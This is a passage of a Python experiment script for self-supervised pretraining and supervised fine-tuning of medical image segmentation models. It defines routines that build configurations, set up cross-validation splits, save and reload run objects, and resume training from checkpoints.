config = load_object(os.path.join(config.object_dir, "config.pkl")) #!
else:
raise FileNotFoundError("Could not find CONFIG object pickle. Did you specify a valid run number?")
if os.path.isfile(os.path.join(config.object_dir, "dataset.pkl")):
dataset = load_object(os.path.join(config.object_dir, "dataset.pkl")) #!
else:
raise FileNotFoundError("Could not find DATASET object pickle. Did you specify a valid run number?")
config.resume_sup = True
config.display()
trainer_mg_replication = Trainer(config, dataset)
trainer_mg_replication.load_model(from_latest_checkpoint=True)
trainer_mg_replication.finetune_supervised()
trainer_mg_replication.add_hparams_to_writer()
trainer_mg_replication.get_stats()
"""
---
PRETRAIN MODEL ON DIFFERENT DATASET WITH MG FRAMEWORK
"""
def pretrain_mg_framework_specific_dataset(**kwargs):
kwargs_dict_ = kwargs["kwargs_dict"]
dataset_list = kwargs_dict_["dataset"]
dataset_list.sort() # alphabetical, IF YOU DO NOT MAINTAIN ORDER A DIFFERENT TASK DIR IS CREATED FOR SAME DATASETS USED: eg: [lidc , brats] vs [brats, lids]
split = kwargs_dict_.get("split", (0.8, 0.2, 0))
mode = kwargs_dict_.get("mode", "")
return_axis_index = kwargs_dict_.get("return_axis_index", False)
advance_index_on = kwargs_dict_["advance_index_on"]
# fix_unsqueeze_order = kwargs_dict_.get("fix_unsqueeze_order", False) #this actually only matters for suppervision, in the 2d setting this is irrelevant
datasets_used_str = get_datasets_used_str(
dataset_list, mode, two_dim_data=kwargs_dict_["two_dimensional_data"], return_axis_index=return_axis_index
)
# config = models_genesis_config(True, task="PRETRAIN_MG_FRAMEWORK{}".format(datasets_used_str))
config = FineTuneConfig(
data_dir="",
task="PRETRAIN_MG_FRAMEWORK{}".format(datasets_used_str),
self_supervised=True,
supervised=False,
model=kwargs_dict_["model"],
extra_info_on_task_dir=False,
)
config.make_config_as_original_mg()
replace_config_param_attributes(config, kwargs_dict_)
config.display()
dataset = build_dataset(
dataset_list=dataset_list,
split=split,
two_dimensional_data=kwargs_dict_["two_dimensional_data"],
data_limit_2d=kwargs_dict_["data_limit_2d"],
return_axis_index=kwargs_dict_["return_axis_index"],
advance_index_on=advance_index_on,
)
save_object(config, "config", config.object_dir)
save_object(dataset, "dataset", config.object_dir)
trainer_mg_replication = Trainer(config, dataset)
trainer_mg_replication.load_model(from_scratch=True) # fix_unsqueeze_order=fix_unsqueeze_order)
trainer_mg_replication.finetune_self_supervised()
trainer_mg_replication.add_hparams_to_writer()
trainer_mg_replication.get_stats()
def resume_pretrain_mg_framework_specific_dataset(run_nr: int, **kwargs):
kwargs_dict_ = kwargs["kwargs_dict"]
dataset_list = kwargs_dict_["dataset"]
dataset_list.sort() # alphabetical, IF YOU DO NOT MAINTAIN ORDER A DIFFERENT TASK DIR IS CREATED FOR SAME DATASETS USED: eg: [lidc , brats] vs [brats, lids]
mode = kwargs_dict_.get("mode", "")
return_axis_index = kwargs_dict_.get("return_axis_index", False)
# fix_unsqueeze_order = kwargs_dict_.get("fix_unsqueeze_order", False)
datasets_used_str = get_datasets_used_str(
dataset_list, mode, two_dim_data=kwargs_dict_["two_dimensional_data"], return_axis_index=return_axis_index
)
# config = models_genesis_config(True, task="PRETRAIN_MG_FRAMEWORK{}".format(datasets_used_str))
config = FineTuneConfig(
data_dir="",
task="PRETRAIN_MG_FRAMEWORK{}".format(datasets_used_str),
self_supervised=True,
supervised=False,
model=kwargs_dict_["model"],
extra_info_on_task_dir=False,
)
config.override_dirs(run_nr)
if os.path.isfile(os.path.join(config.object_dir, "config.pkl")):
config = load_object(os.path.join(config.object_dir, "config.pkl")) #!
else:
raise FileNotFoundError("Could not find CONFIG object pickle. Did you specify a valid run number?")
if os.path.isfile(os.path.join(config.object_dir, "dataset.pkl")):
dataset = load_object(os.path.join(config.object_dir, "dataset.pkl")) #!
else:
raise FileNotFoundError("Could not find DATASET object pickle. Did you specify a valid run number?")
replace_config_param_attributes(config, kwargs_dict_)
config.resume_ss = True
config.display()
trainer_mg_replication = Trainer(config, dataset)
trainer_mg_replication.load_model(from_latest_checkpoint=True)
trainer_mg_replication.finetune_self_supervised()
trainer_mg_replication.add_hparams_to_writer()
trainer_mg_replication.get_stats()
"""
---
"""
def use_provided_weights_and_finetune_on_dataset_without_ss(**kwargs):
kwargs_dict_ = kwargs["kwargs_dict"]
num_cv_folds = kwargs_dict_.get("num_cv_folds", None)
dataset_list = kwargs_dict_["dataset"]
dataset_list.sort() # alphabetical, IF YOU DO NOT MAINTAIN ORDER A DIFFERENT TASK DIR IS CREATED FOR SAME DATASETS USED: eg: [lidc , brats] vs [brats, lids]
split = kwargs_dict_.get("split", (0.8, 0.2, 0))
mode = kwargs_dict_.get("mode", "")
new_folder = kwargs_dict_["new_folder"]
datasets_used_str = get_datasets_used_str(dataset_list, mode, two_dim_data=kwargs_dict_["two_dimensional_data"])
dataset = build_dataset(dataset_list=dataset_list, split=split, use_supervision_transforms=kwargs_dict_["use_supervision_transforms"])
config = FineTuneConfig(
data_dir="",
task="FROM_PROVIDED_WEIGHTS{}".format(datasets_used_str)
if kwargs_dict_["task_name"] is None
else "{}{}".format(kwargs_dict_["task_name"], datasets_used_str),
self_supervised=False,
supervised=True,
new_folder=new_folder,
)
replace_config_param_attributes(config, kwargs_dict_)
config.resume_from_provided_weights = True # Redundant, just for logging purposes
if num_cv_folds is not None:
cv = get_cross_validator_object_of_task_dir(config.task_dir)
if cv is None:
if config.experiment_nr == 1:
cv = CrossValidator(config, dataset, nr_splits=num_cv_folds)
cv.override_dataset_files_with_splits()
save_object(cv, "cross_validator", config.object_dir)
print("RUN 1: Building cross validator")
else:
print("TOO LATE TO BRING CROSS VALIDATON IN")
else:
cv.set_dataset(dataset)
cv.override_dataset_files_with_splits()
# to "loose" used splits as they're popped and needs to be saved in run1 objects
save_cross_validator_object_of_task_dir(cv, config.task_dir)
config.display()
save_object(config, "config", config.object_dir)
save_object(dataset, "dataset", config.object_dir)
trainer = Trainer(config, dataset)
trainer.load_model(from_provided_weights=True)
trainer.finetune_supervised()
trainer.add_hparams_to_writer()
trainer.get_stats()
def resume_use_provided_weights_and_finetune_on_dataset_without_ss(run_nr: int, **kwargs):
kwargs_dict_ = kwargs["kwargs_dict"]
dataset_list = kwargs_dict_["dataset"]
dataset_list.sort()
mode = kwargs_dict_.get("mode", "")
new_folder = kwargs_dict_["new_folder"]
datasets_used_str = get_datasets_used_str(dataset_list, mode, two_dim_data=kwargs_dict_["two_dimensional_data"])
config = FineTuneConfig(
data_dir="",
task="FROM_PROVIDED_WEIGHTS{}".format(datasets_used_str),
self_supervised=False,
supervised=True,
new_folder=new_folder,
)
config.override_dirs(run_nr) # its key we get object_dir corresponding to the run to fetch the correct config object saved
if os.path.isfile(os.path.join(config.object_dir, "config.pkl")):
config = load_object(os.path.join(config.object_dir, "config.pkl")) #!
else:
raise FileNotFoundError("Could not find CONFIG object pickle. Did you specify a valid run number?")
if os.path.isfile(os.path.join(config.object_dir, "dataset.pkl")):
dataset = load_object(os.path.join(config.object_dir, "dataset.pkl")) #!
else:
raise FileNotFoundError("Could not find DATASET object pickle. Did you specify a valid run number?")
replace_config_param_attributes(config, kwargs_dict_)
config.resume_sup = True
config.display()
trainer = Trainer(config, dataset)
trainer.load_model(from_latest_checkpoint=True)
trainer.finetune_supervised()
trainer.add_hparams_to_writer()
trainer.get_stats()
"""
---
"""
def use_provided_weights_and_finetune_on_dataset_with_ss(**kwargs):
kwargs_dict_ = kwargs["kwargs_dict"]
num_cv_folds = kwargs_dict_.get("num_cv_folds", None)
dataset_list = kwargs_dict_["dataset"]
dataset_list.sort()
split = kwargs_dict_.get("split", (0.8, 0.2, 0))
mode = kwargs_dict_.get("mode", "")
datasets_used_str = get_datasets_used_str(dataset_list, mode, two_dim_data=kwargs_dict_["two_dimensional_data"])
new_folder = kwargs_dict_["new_folder"]
dataset = build_dataset(dataset_list=dataset_list, split=split)
config = FineTuneConfig(
data_dir="",
task="FROM_PROVIDED_WEIGHTS{}".format(datasets_used_str),
self_supervised=True,
supervised=True,
model=kwargs_dict_["model"],
new_folder=new_folder,
)
replace_config_param_attributes(config, kwargs_dict_)
config.resume_from_provided_weights = True # Redundant, just for logging purposes
if num_cv_folds is not None:
cv = get_cross_validator_object_of_task_dir(config.task_dir)
if cv is None:
if config.experiment_nr == 1:
cv = CrossValidator(config, dataset, nr_splits=num_cv_folds)
cv.override_dataset_files_with_splits()
save_object(cv, "cross_validator", config.object_dir)
print("RUN 1: Building cross validator")
else:
print("TOO LATE TO BRING CROSS VALIDATON IN")
else:
cv.set_dataset(dataset)
cv.override_dataset_files_with_splits()
# to "loose" used splits as they're popped and needs to be saved in run1 objects
save_cross_validator_object_of_task_dir(cv, config.task_dir)
config.display()
save_object(config, "config", config.object_dir)
save_object(dataset, "dataset", config.object_dir)
trainer = Trainer(config, dataset)
trainer.load_model(from_provided_weights=True)
trainer.finetune_self_supervised()
trainer.load_model(from_latest_improvement_ss=True)
trainer.finetune_supervised()
trainer.add_hparams_to_writer()
trainer.get_stats()
def resume_use_provided_weights_and_finetune_on_dataset_with_ss(run_nr: int, **kwargs):
kwargs_dict_ = kwargs["kwargs_dict"]
dataset_list = kwargs_dict_["dataset"]
dataset_list.sort()
mode = kwargs_dict_.get("mode", "")
new_folder = kwargs_dict_["new_folder"]
datasets_used_str = get_datasets_used_str(dataset_list, mode, two_dim_data=kwargs_dict_["two_dimensional_data"])
config = FineTuneConfig(
data_dir="",
task="FROM_PROVIDED_WEIGHTS{}".format(datasets_used_str),
self_supervised=True,
supervised=True,
model=kwargs_dict_["model"],
new_folder=new_folder,
)
config.override_dirs(run_nr) # its key we get object_dir corresponding to the run to fetch the correct config object saved
if os.path.isfile(os.path.join(config.object_dir, "config.pkl")):
config = load_object(os.path.join(config.object_dir, "config.pkl")) #!
else:
raise FileNotFoundError("Could not find CONFIG object pickle. Did you specify a valid run number?")
if os.path.isfile(os.path.join(config.object_dir, "dataset.pkl")):
dataset = load_object(os.path.join(config.object_dir, "dataset.pkl")) #!
else:
raise FileNotFoundError("Could not find DATASET object pickle. Did you specify a valid run number?")
replace_config_param_attributes(config, kwargs_dict_)
config.resume_ss = True
config.resume_sup = True
config.display()
trainer = Trainer(config, dataset)
completed_ss = trainer.ss_has_been_completed()
if not completed_ss:
trainer.load_model(from_latest_checkpoint=True)
trainer.finetune_self_supervised()
trainer.load_model(from_latest_improvement_ss=True)
trainer.finetune_supervised()
trainer.add_hparams_to_writer()
trainer.get_stats()
else:
trainer.load_model(from_latest_checkpoint=True)
trainer.finetune_supervised()
trainer.add_hparams_to_writer()
trainer.get_stats()
"""
---
"""
def use_model_weights_and_do_self_supervision(**kwargs):
# pass it the directory of the task that the model you want to resume from is
kwargs_dict_ = kwargs["kwargs_dict"]
num_cv_folds = kwargs_dict_.get("num_cv_folds", None)
dataset_list = kwargs_dict_["dataset"]
dataset_list.sort()
model_weights_dir = kwargs_dict_["directory"]
split = kwargs_dict_.get("split", (0.8, 0.2, 0))
mode = kwargs_dict_.get("mode", "")
convert_acs = kwargs_dict_["convert_to_acs"]
new_folder = kwargs_dict_["new_folder"]
datasets_used_str = get_datasets_used_str(
dataset_list, mode, two_dim_data=kwargs_dict_["two_dimensional_data"], convert_to_acs=convert_acs
)
dataset = build_dataset(
dataset_list=dataset_list,
split=split,
two_dimensional_data=kwargs_dict_["two_dimensional_data"],
use_supervision_transforms=kwargs_dict_["use_supervision_transforms"],
)
config = FineTuneConfig(
data_dir="",
task="FROM_{}_DO_SS_ON_{}".format(model_weights_dir, datasets_used_str),
self_supervised=True,
supervised=False,
model=kwargs_dict_["model"],
new_folder=new_folder,
)
config.make_config_as_original_mg()
replace_config_param_attributes(config, kwargs_dict_)
config.resume_from_specific_model = True # Redundant, just for logging purposes
if num_cv_folds is not None:
cv = get_cross_validator_object_of_task_dir(config.task_dir)
if cv is None:
if config.experiment_nr == 1:
cv = CrossValidator(config, dataset, nr_splits=num_cv_folds)
cv.override_dataset_files_with_splits()
save_object(cv, "cross_validator", config.object_dir)
print("RUN 1: Building cross validator")
else:
print("TOO LATE TO BRING CROSS VALIDATON IN")
else:
cv.set_dataset(dataset)
cv.override_dataset_files_with_splits()
# to "loose" used splits as they're popped and needs to be saved in run1 objects
save_cross_validator_object_of_task_dir(cv, config.task_dir)
config.display()
save_object(config, "config", config.object_dir)
save_object(dataset, "dataset", config.object_dir)
trainer = Trainer(config, dataset)
trainer.load_model(from_directory=True, directory=model_weights_dir, convert_acs=convert_acs)
trainer.finetune_self_supervised()
trainer.add_hparams_to_writer()
trainer.get_stats()
def resume_use_model_weights_and_do_self_supervision(run_nr: int, **kwargs):
kwargs_dict_ = kwargs["kwargs_dict"]
dataset_list = kwargs_dict_["dataset"]
dataset_list.sort()
model_weights_dir = kwargs_dict_["directory"] # to find the task dir to resume from
mode = kwargs_dict_.get("mode", "")
convert_acs = kwargs_dict_["convert_to_acs"] # needs to be called on resume to find task dir
datasets_used_str = get_datasets_used_str(
dataset_list, mode, two_dim_data=kwargs_dict_["two_dimensional_data"], convert_to_acs=convert_acs
)
config = FineTuneConfig(
data_dir="",
task="FROM_{}_DO_SS_ON_{}".format(model_weights_dir, datasets_used_str),
self_supervised=True,
supervised=False,
model=kwargs_dict_["model"],
new_folder=kwargs_dict_["new_folder"],
)
config.override_dirs(run_nr)
if os.path.isfile(os.path.join(config.object_dir, "config.pkl")):
config = load_object(os.path.join(config.object_dir, "config.pkl")) #!
else:
raise FileNotFoundError(
"Could not find CONFIG object pickle. Did you specify a valid run number? Path was {}".format(
os.path.join(config.object_dir, "config.pkl")
)
)
if os.path.isfile(os.path.join(config.object_dir, "dataset.pkl")):
dataset = load_object(os.path.join(config.object_dir, "dataset.pkl")) #!
else:
raise FileNotFoundError("Could not find DATASET object pickle. Did you specify a valid run number?")
replace_config_param_attributes(config, kwargs_dict_, ilegal=["model"])
config.resume_ss = True
config.display()
trainer = Trainer(config, dataset)
trainer.load_model(from_latest_checkpoint=True) # if convert ACS the resume should already hae unet_acs as model
trainer.finetune_self_supervised()
trainer.add_hparams_to_writer()
trainer.get_stats()
def use_model_weights_and_finetune_on_dataset_without_ss(**kwargs):
# pass it the directory of the task that the model you want to resume from is
kwargs_dict_ = kwargs["kwargs_dict"]
num_cv_folds = kwargs_dict_.get("num_cv_folds", None)
dataset_list = kwargs_dict_["dataset"]
dataset_list.sort()
model_weights_dir = kwargs_dict_["directory"]
split = kwargs_dict_.get("split", (0.8, 0.2, 0))
mode = kwargs_dict_.get("mode", "")
convert_acs = kwargs_dict_["convert_to_acs"]
new_folder = kwargs_dict_["new_folder"]
# unet cls
pool_features = kwargs_dict_["pool_features"]
encoder_depth = kwargs_dict_.get("encoder_depth", None)
branch_arch = kwargs_dict_.get("branch_arch", None)
branch_depth = kwargs_dict_.get("branch_depth", None)
bridge_mode = kwargs_dict_.get("bridge_mode", None)
datasets_used_str = get_datasets_used_str(
dataset_list, mode, two_dim_data=kwargs_dict_["two_dimensional_data"], convert_to_acs=convert_acs
)
if bridge_mode is not None:
datasets_used_str = bridge_mode + datasets_used_str
if branch_depth is not None:
datasets_used_str = "_depth_{}".format(branch_depth) + datasets_used_str
if branch_arch is not None:
datasets_used_str = branch_arch + datasets_used_str
if encoder_depth is not None:
tmp = ""
for i in encoder_depth:
tmp = tmp + "_{}_".format(i)
datasets_used_str = tmp + datasets_used_str
dataset = build_dataset(
dataset_list=dataset_list,
split=split,
two_dimensional_data=kwargs_dict_["two_dimensional_data"],
use_supervision_transforms=kwargs_dict_["use_supervision_transforms"],
)
config = FineTuneConfig(
data_dir="",
task="FROM_{}_{}".format(model_weights_dir, datasets_used_str),
self_supervised=False,
supervised=True,
model=kwargs_dict_["model"],
new_folder=new_folder,
)
replace_config_param_attributes(config, kwargs_dict_)
config.resume_from_specific_model = True # Redundant, just for logging purposes
if num_cv_folds is not None:
cv = get_cross_validator_object_of_task_dir(config.task_dir)
if cv is None:
if config.experiment_nr == 1:
cv = CrossValidator(config, dataset, nr_splits=num_cv_folds)
cv.override_dataset_files_with_splits()
save_object(cv, "cross_validator", config.object_dir)
print("RUN 1: Building cross validator")
else:
print("TOO LATE TO BRING CROSS VALIDATON IN")
else:
cv.set_dataset(dataset)
cv.override_dataset_files_with_splits()
# to "loose" used splits as they're popped and needs to be saved in run1 objects
save_cross_validator_object_of_task_dir(cv, config.task_dir)
config.display()
save_object(config, "config", config.object_dir)
save_object(dataset, "dataset", config.object_dir)
trainer = Trainer(config, dataset)
trainer.load_model(
from_directory=True,
directory=model_weights_dir,
convert_acs=convert_acs,
pool_features=pool_features,
encoder_depth=encoder_depth,
branch_arch=branch_arch,
branch_depth=branch_depth,
bridge_mode=bridge_mode,
)
trainer.finetune_supervised()
trainer.add_hparams_to_writer()
trainer.get_stats()
def resume_use_model_weights_and_finetune_on_dataset_without_ss(run_nr: int, **kwargs):
kwargs_dict_ = kwargs["kwargs_dict"]
dataset_list = kwargs_dict_["dataset"]
dataset_list.sort()
model_weights_dir = kwargs_dict_["directory"] # to find the task dir to resume from
mode = kwargs_dict_.get("mode", "")
convert_acs = kwargs_dict_["convert_to_acs"] # needs to be called on resume to find task dir
new_folder = kwargs_dict_["new_folder"]
datasets_used_str = get_datasets_used_str(
dataset_list, mode, two_dim_data=kwargs_dict_["two_dimensional_data"], convert_to_acs=convert_acs
)
config = FineTuneConfig(
data_dir="",
task="FROM_{}_{}".format(model_weights_dir, datasets_used_str),
self_supervised=False,
supervised=True,
model=kwargs_dict_["model"],
new_folder=kwargs_dict_["new_folder"],
)
config.override_dirs(run_nr)
if os.path.isfile(os.path.join(config.object_dir, "config.pkl")):
config = load_object(os.path.join(config.object_dir, "config.pkl")) #!
else:
raise FileNotFoundError("Could not find CONFIG object pickle. Did you specify a valid run number?")
if os.path.isfile(os.path.join(config.object_dir, "dataset.pkl")):
dataset = load_object(os.path.join(config.object_dir, "dataset.pkl")) #!
else:
raise FileNotFoundError("Could not find DATASET object pickle. Did you specify a valid run number?")
replace_config_param_attributes(config, kwargs_dict_, ilegal=["model"])
config.resume_sup = True
config.display()
trainer = Trainer(config, dataset)
trainer.load_model(from_latest_checkpoint=True) # if convert ACS the resume should already hae unet_acs as model
trainer.finetune_supervised()
trainer.add_hparams_to_writer()
trainer.get_stats()
"""
---
"""
def use_model_weights_and_finetune_on_dataset_with_ss(**kwargs):
kwargs_dict_ = kwargs["kwargs_dict"]
num_cv_folds = kwargs_dict_.get("num_cv_folds", None)
dataset_list = kwargs_dict_["dataset"]
dataset_list.sort()
model_weights_dir = kwargs_dict_["directory"]
split = kwargs_dict_.get("split", (0.8, 0.2, 0))
mode = kwargs_dict_.get("mode", "")
convert_acs = kwargs_dict_["convert_to_acs"] # needs to be called on resume to find task dir
datasets_used_str = get_datasets_used_str(
dataset_list, mode, two_dim_data=kwargs_dict_["two_dimensional_data"], convert_to_acs=convert_acs
)
dataset = build_dataset(dataset_list=dataset_list, split=split, two_dimensional_data=kwargs_dict_["two_dimensional_data"])
config = FineTuneConfig(
data_dir="",
task="FROM_{}_{}".format(model_weights_dir, datasets_used_str),
self_supervised=True,
supervised=True,
model=kwargs_dict_["model"],
)
replace_config_param_attributes(config, kwargs_dict_)
config.resume_from_specific_model = True # Redundant, just for logging purposes
if num_cv_folds is not None:
cv = get_cross_validator_object_of_task_dir(config.task_dir)
if cv is None:
if config.experiment_nr == 1:
cv = CrossValidator(config, dataset, nr_splits=num_cv_folds)
cv.override_dataset_files_with_splits()
save_object(cv, "cross_validator", config.object_dir)
print("RUN 1: Building cross validator")
else:
print("TOO LATE TO BRING CROSS VALIDATON IN")
else:
cv.set_dataset(dataset)
cv.override_dataset_files_with_splits()
# to "loose" used splits as they're popped and needs to be saved in run1 objects
save_cross_validator_object_of_task_dir(cv, config.task_dir)
config.display()
save_object(config, "config", config.object_dir)
save_object(dataset, "dataset", config.object_dir)
trainer = Trainer(config, dataset)
trainer.load_model(from_directory=True, directory=model_weights_dir, convert_acs=convert_acs)
trainer.finetune_self_supervised()
trainer.load_model(from_latest_improvement_ss=True) # here it's already loading from the dir of the task
trainer.finetune_supervised()
trainer.add_hparams_to_writer()
trainer.get_stats()
def resume_use_model_weights_and_finetune_on_dataset_with_ss(run_nr: int, **kwargs):
kwargs_dict_ = kwargs["kwargs_dict"]
dataset_list = kwargs_dict_["dataset"]
dataset_list.sort()
model_weights_dir = kwargs_dict_["directory"]
mode = kwargs_dict_.get("mode", "")
convert_acs = kwargs_dict_["convert_to_acs"] # needs to be called on resume to find task dir
datasets_used_str = get_datasets_used_str(
dataset_list, mode, two_dim_data=kwargs_dict_["two_dimensional_data"], convert_to_acs=convert_acs
)
config = FineTuneConfig(
data_dir="",
task="FROM_{}_{}".format(model_weights_dir, datasets_used_str),
self_supervised=True,
supervised=True,
model=kwargs_dict_["model"],
)
config.override_dirs(run_nr)
if os.path.isfile(os.path.join(config.object_dir, "config.pkl")):
config = load_object(os.path.join(config.object_dir, "config.pkl")) #!
else:
raise FileNotFoundError("Could not find CONFIG object pickle. Did you specify a valid run number?")
if os.path.isfile(os.path.join(config.object_dir, "dataset.pkl")):
dataset = load_object(os.path.join(config.object_dir, "dataset.pkl")) #!
else:
raise FileNotFoundError("Could not find DATASET object pickle. Did you specify a valid run number?")
replace_config_param_attributes(config, kwargs_dict_)
config.resume_ss = True
config.resume_sup = True
config.display()
trainer = Trainer(config, dataset)
completed_ss = trainer.ss_has_been_completed()
# acs resuming: if it's resuming config should already have unet_acs as model
if not completed_ss:
trainer.load_model(from_latest_checkpoint=True)
trainer.finetune_self_supervised()
trainer.load_model(from_latest_improvement_ss=True)
trainer.finetune_supervised()
trainer.add_hparams_to_writer()
trainer.get_stats()
else:
trainer.load_model(from_latest_checkpoint=True)
trainer.finetune_supervised()
trainer.add_hparams_to_writer()
trainer.get_stats()
"""
---
"""
def train_from_scratch_on_dataset_no_ss(**kwargs):
kwargs_dict_ = kwargs["kwargs_dict"]
num_cv_folds = kwargs_dict_.get("num_cv_folds", None)
cv_fold = kwargs_dict_["cv_fold"]
dataset_list = kwargs_dict_["dataset"]
dataset_list.sort() # alphabetical, IF YOU DO NOT MAINTAIN ORDER A DIFFERENT TASK DIR IS CREATED FOR SAME DATASETS USED: eg: [lidc , brats] vs [brats, lids]
split = kwargs_dict_.get("split", (0.8, 0.2, 0))
mode = kwargs_dict_.get("mode", "")
make_acs_kernel_split_adaptive_to_input_dimensions = kwargs_dict_.get("make_acs_kernel_split_adaptive_to_input_dimensions", None)
# unet cls
pool_features = kwargs_dict_["pool_features"]
encoder_depth = kwargs_dict_.get("encoder_depth", None)
branch_arch = kwargs_dict_.get("branch_arch", None)
branch_depth = kwargs_dict_.get("branch_depth", None)
bridge_mode = kwargs_dict_.get("bridge_mode", None)
introduce_surrogate_at_epoch = kwargs_dict_.get("introduce_surrogate_at_epoch", 0)
add_batch_size_to_task = kwargs_dict_.get("add_batch_size_to_task", False)
add_to_task = kwargs_dict_.get("add_to_task", False)
surrogate_loss_weight = kwargs_dict_.get("surrogate_loss_weight", False)
for i, j in kwargs_dict_.items():
print(i, j)
datasets_used_str = get_datasets_used_str(dataset_list, mode, two_dim_data=kwargs_dict_["two_dimensional_data"])
if make_acs_kernel_split_adaptive_to_input_dimensions is True:
datasets_used_str = "_WITH_ADAPTIVE_ACS_KERNEL" + datasets_used_str
if bridge_mode is not None:
datasets_used_str = bridge_mode + datasets_used_str
if branch_depth is not None:
datasets_used_str = "_depth_{}".format(branch_depth) + datasets_used_str
if branch_arch is not None:
datasets_used_str = branch_arch + datasets_used_str
encoder_depth_str = ""
if encoder_depth is not None:
for idx, i in enumerate(encoder_depth):
encoder_depth_str += "_{}".format(i)
if cv_fold is True:
encoder_depth_str += "_same_partition"
if introduce_surrogate_at_epoch != 0:
encoder_depth_str += "_introduce_at_{}".format(introduce_surrogate_at_epoch)
if add_batch_size_to_task is not False:
batch_size_sup = kwargs_dict_["batch_size_sup"]
encoder_depth_str += "_batch_{}".format(batch_size_sup)
if add_to_task != "":
encoder_depth_str += "_{}".format(add_to_task)
if surrogate_loss_weight is not False:
encoder_depth_str += "_{}".format(surrogate_loss_weight)
dataset = build_dataset(
dataset_list=dataset_list,
split=split,
two_dimensional_data=kwargs_dict_["two_dimensional_data"],
use_supervision_transforms=kwargs_dict_["use_supervision_transforms"],
)
config = FineTuneConfig(
data_dir="",
task="FROM_SCRATCH{}".format(datasets_used_str),
self_supervised=False,
supervised=True,
model=kwargs_dict_["model"],
add_to_task=encoder_depth_str,
)
replace_config_param_attributes(config, kwargs_dict_)
config.from_scratch = True # Redundant, just for logging purposes
# TODO: move to function call
if make_acs_kernel_split_adaptive_to_input_dimensions is True:
x, y = dataset.get_train(batch_size=1)
shape = x.shape[2:]
total = 0
for i in shape:
total += i
acs_kernel_split = tuple([float(i / total) for i in shape])
dataset.reset()
else:
acs_kernel_split = None
if cv_fold is True:
if add_to_task == "new_test_set":
cv = CrossValidator(config, dataset, nr_splits=5, force_generate_splits=True, new_test_set=True)
else:
cv = CrossValidator(config, dataset, nr_splits=5, force_generate_splits=True)
cv.override_dataset_files_with_splits() # use 1st partition only
if num_cv_folds is not None:
if cv_fold is True:
raise ValueError
cv = get_cross_validator_object_of_task_dir(config.task_dir)
if cv is None:
if config.experiment_nr == 1:
if add_to_task == "new_test_set":
cv = CrossValidator(config, dataset, nr_splits=num_cv_folds, new_test_set=True)
else:
cv = CrossValidator(config, dataset, nr_splits=num_cv_folds)
cv.override_dataset_files_with_splits()
save_object(cv, "cross_validator", config.object_dir)
print("RUN 1: Building cross validator")
else:
print("TOO LATE TO BRING CROSS VALIDATON IN")
else:
cv.set_dataset(dataset)
cv.override_dataset_files_with_splits()
# to "loose" used splits as they're popped and needs to be saved in run1 objects
save_cross_validator_object_of_task_dir(cv, config.task_dir)
config.display()
save_object(config, "config", config.object_dir)
save_object(dataset, "dataset", config.object_dir)
trainer = Trainer(config, dataset)
trainer.load_model(
from_scratch=True,
acs_kernel_split=acs_kernel_split,
pool_features=pool_features,
encoder_depth=encoder_depth,
branch_arch=branch_arch,
branch_depth=branch_depth,
bridge_mode=bridge_mode,
in_channels=kwargs_dict_["in_channels"],
out_channels=kwargs_dict_["out_channels"],
)
trainer.finetune_supervised()
trainer.add_hparams_to_writer()
trainer.get_stats()
def resume_train_from_scratch_on_dataset_no_ss(run_nr: int, **kwargs):
kwargs_dict_ = kwargs["kwargs_dict"]
dataset_list = kwargs_dict_["dataset"]
dataset_list.sort() # alphabetical, IF YOU DO NOT MAINTAIN ORDER A DIFFERENT TASK DIR IS CREATED FOR SAME DATASETS USED: eg: [lidc , brats] vs [brats, lids]
mode = kwargs_dict_.get("mode", "")
datasets_used_str = get_datasets_used_str(dataset_list, mode, two_dim_data=kwargs_dict_["two_dimensional_data"])
config = FineTuneConfig(
data_dir="", task="FROM_SCRATCH{}".format(datasets_used_str), self_supervised=False, supervised=True, model=kwargs_dict_["model"]
)
config.override_dirs(run_nr)
if os.path.isfile(os.path.join(config.object_dir, "config.pkl")):
config = load_object(os.path.join(config.object_dir, "config.pkl")) #!
else:
raise FileNotFoundError("Could not find CONFIG object pickle. Did you specify a valid run number?")
if os.path.isfile(os.path.join(config.object_dir, "dataset.pkl")):
dataset = load_object(os.path.join(config.object_dir, "dataset.pkl")) #!
else:
raise FileNotFoundError("Could not find DATASET object pickle. Did you specify a valid run number?")
replace_config_param_attributes(config, kwargs_dict_)
config.resume_sup = True
config.display()
trainer = Trainer(config, dataset)
trainer.load_model(from_latest_checkpoint=True, in_channel=kwargs_dict_["in_channels"], out_channels=kwargs_dict_["out_channels"])
trainer.finetune_supervised()
trainer.add_hparams_to_writer()
trainer.get_stats()
"""
---
"""
def train_from_scratch_on_dataset_with_ss(**kwargs):
kwargs_dict_ = kwargs["kwargs_dict"]
num_cv_folds = kwargs_dict_.get("num_cv_folds", None)
dataset_list = kwargs_dict_["dataset"]
dataset_list.sort() # alphabetical, IF YOU DO NOT MAINTAIN ORDER A DIFFERENT TASK DIR IS CREATED FOR SAME DATASETS USED: eg: [lidc , brats] vs [brats, lids]
split = kwargs_dict_.get("split", (0.8, 0.2, 0))
mode = kwargs_dict_.get("mode", "")
datasets_used_str = get_datasets_used_str(dataset_list, mode, two_dim_data=kwargs_dict_["two_dimensional_data"])
dataset = build_dataset(dataset_list=dataset_list, split=split, two_dimensional_data=kwargs_dict_["two_dimensional_data"])
config = FineTuneConfig(
data_dir="", task="FROM_SCRATCH{}".format(datasets_used_str), self_supervised=True, supervised=True, model=kwargs_dict_["model"]
)
replace_config_param_attributes(config, kwargs_dict_)
config.from_scratch = True # Redundant, just for logging purposes
if num_cv_folds is not None:
cv = get_cross_validator_object_of_task_dir(config.task_dir)
if cv is None:
if config.experiment_nr == 1:
cv = CrossValidator(config, dataset, nr_splits=num_cv_folds)
cv.override_dataset_files_with_splits()
save_object(cv, "cross_validator", config.object_dir)
print("RUN 1: Building cross validator")
else:
print("TOO LATE TO BRING CROSS VALIDATON IN")
else:
cv.set_dataset(dataset)
cv.override_dataset_files_with_splits()
# to "loose" used splits as they're popped and needs to be saved in run1 objects
save_cross_validator_object_of_task_dir(cv, config.task_dir)
config.display()
save_object(config, "config", config.object_dir)
save_object(dataset, "dataset", config.object_dir)
trainer = Trainer(config, dataset)
trainer.load_model(from_scratch=True)
trainer.finetune_self_supervised()
trainer.load_model(from_latest_improvement_ss=True) # here it's already loading from the dir of the task
trainer.finetune_supervised()
trainer.add_hparams_to_writer()
trainer.get_stats()
def resume_train_from_scratch_on_dataset_with_ss(run_nr: int, **kwargs):
kwargs_dict_ = kwargs["kwargs_dict"]
dataset_list = kwargs_dict_["dataset"]
